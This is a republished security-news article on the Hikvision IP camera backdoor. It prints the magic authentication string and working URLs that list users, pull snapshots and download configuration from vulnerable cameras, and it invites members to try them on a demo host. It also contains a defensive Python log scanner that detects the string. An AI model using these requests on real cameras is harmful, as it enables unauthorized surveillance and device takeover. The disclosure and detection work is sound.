IPVM has published an article regarding Hikvision's security risks.

Hikvision Backdoor Exploit

Author: Brian Karas, Published on Sep 18, 2017

Full disclosure to the Hikvision backdoor has been released, allowing easy exploit of vulnerable Hikvision IP cameras.

As the researcher, Monte Crypto, who disclosed the details confirmed, this is:

a backdoor that allows unauthenticated impersonation of any configured user account... the vulnerability is trivial to exploit

Key points from IPVM's analysis and testing of the exploit:

  • The details prove how simple and fundamental the backdoor is.
  • The exploit is already being repurposed as a 'tool', distributed online.
  • A clear majority of Hikvision IP cameras remain vulnerable.
  • Hikvision's earlier disclosure significantly misled its dealers as to the severity of the backdoor.
  • Hikvision, again, has been silent, failing to inform and warn its dealers of this new disclosure.

Plus, IPVM has set up a vulnerable Hikvision IP camera so members can test and better understand the exploit.

Demonstration

We produced the following video, showing just how simple it is to use this exploit to retrieve an image snapshot and system information from a camera. We also show using a password reset tool to take over a camera:

Inside this post, we examine how the exploit works, how it is being used, what percentage of devices are vulnerable, and Hikvision's failure to respond to the exploit's release.

Magic String Backdoor

Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that was needed was appending this string to Hikvision camera commands:

?auth=YWRtaW46MTEK

As the researcher explained in his disclosure:

Retrieve a list of all users and their roles:
    http://camera.ip/Security/users?auth=YWRtaW46MTEK

Obtain a camera snapshot without authentication:
    http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

All other HikCGI calls can be impersonated in the same way, including those that add new users or flash camera firmware. Because most Hikvision devices only protect firmware images by obfuscation, one can flash arbitrary code or render hundreds of thousands of connected devices permanently unusable with just one simple http call.

And worst of all, one can download camera configuration:
    http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

Any accessible Hikvision camera with affected firmware is vulnerable to complete takeover or bricking. Hikvision released a firmware fix in March 2017, though IPVM stats show that 60%+ of Hikvision cameras are still vulnerable (detailed below).
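A defender-side check, added here as an example and not taken from the article or from Hikvision: it scans ordinary web-server or proxy access logs for requests to HikCGI paths that carry an auth= query parameter, treats the magic string above as critical, and notes whether the device actually served the request (a 2xx on such a request means the camera is unpatched). The log layout, the path list drawn from the researcher's examples, and the sample lines are constructed for this example.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Backdoor string quoted in the article. Like HTTP Basic auth it is base64 of
# "user:password", so the first half tells you which account was impersonated.
MAGIC_AUTH = "YWRtaW46MTEK"

# HikCGI paths named in the disclosure; any "?auth=" on these deserves an alert.
HIKCGI_PATHS = ("/Security/users", "/onvif-http/snapshot",
                "/System/configurationFile", "/System/deviceInfo")

# Common access-log layout: client, timestamp, request line, status (assumed format).
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')


def decode_user(token):
    """Best effort: recover the user half of a base64 'user:password' token."""
    try:
        plain = base64.b64decode(token, validate=True).decode("ascii", "replace")
    except (ValueError, UnicodeDecodeError):
        return "?"
    return plain.split(":", 1)[0].strip() or "?"


def inspect(line):
    """Return a finding dict for one access-log line, or None if it is clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    tokens = parse_qs(url.query).get("auth", [])
    if not tokens:
        return None
    magic = MAGIC_AUTH in tokens
    severity = "critical" if magic else ("high" if url.path in HIKCGI_PATHS else "suspicious")
    return {"src": m["src"], "path": url.path, "status": int(m["status"]),
            "magic_string": magic, "user": decode_user(tokens[0]), "severity": severity,
            # 2xx with the backdoor string means the camera served it: unpatched device.
            "bypass_succeeded": magic and m["status"].startswith("2")}


def scan(lines):
    return [f for f in map(inspect, lines) if f]


SAMPLE_LOG = [  # constructed sample lines, not a real capture
    '10.0.0.5 - - [18/Sep/2017:10:01:02 +0000] "GET /onvif-http/snapshot?auth=YWRtaW46MTEK HTTP/1.1" 200 51234',
    '10.0.0.9 - - [18/Sep/2017:10:01:07 +0000] "GET /System/deviceInfo HTTP/1.1" 401 0',
    '10.0.0.9 - - [18/Sep/2017:10:01:09 +0000] "GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1" 401 0',
    '10.0.0.7 - - [18/Sep/2017:10:02:00 +0000] "GET /Security/users?auth=Zm9vOmJhcg== HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The third sample line shows the useful negative case: the magic string was tried but the camera answered 401, which is what a patched device looks like in the logs.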

DHS Worst Ranking - 10.0

DHS' ranking of this vulnerability as a 10/10 is even more understandable now that the simplicity of compromising these devices has been proven. This vulnerability is significantly more critical than other recent cyber security announcements in the security industry (e.g.: Dahua Suffers Second Major Vulnerability, ONVIF / gSOAP Vulnerability, Axis Camera Vulnerabilities From Google Researcher Analyzed), due to the ease of exploit, the number of impacted devices, and the fact that many impacted devices (e.g., 'grey market') cannot be upgraded to patched firmware.

Hack Our Hikvision Camera

IPVM has put a vulnerable Hikvision camera online for members to experiment with. Access details are:

http://hikvisionbackdoor.ddns.net [NOTE: will show login page with strong admin password]

However, using the backdoor string, that will not matter as you can simply bypass authentication, for example:

Get an unauthorized snapshot from the camera: http://hikvisionbackdoor.ddns.net/onvif-http/snapshot?auth=YWRtaW46MTEK

Get unauthorized device info: http://hikvisionbackdoor.ddns.net/System/deviceInfo?auth=YWRtaW46MTEK [Note: the header will say "This XML file does not appear to have any style information"; look at the device info details below that]

For more examples of Hikvision CGI commands, see the HikCGI Integration Guide, HikCGI Image Display. Post your examples and experiences in the comments.

Planted, Accident or Incompetence?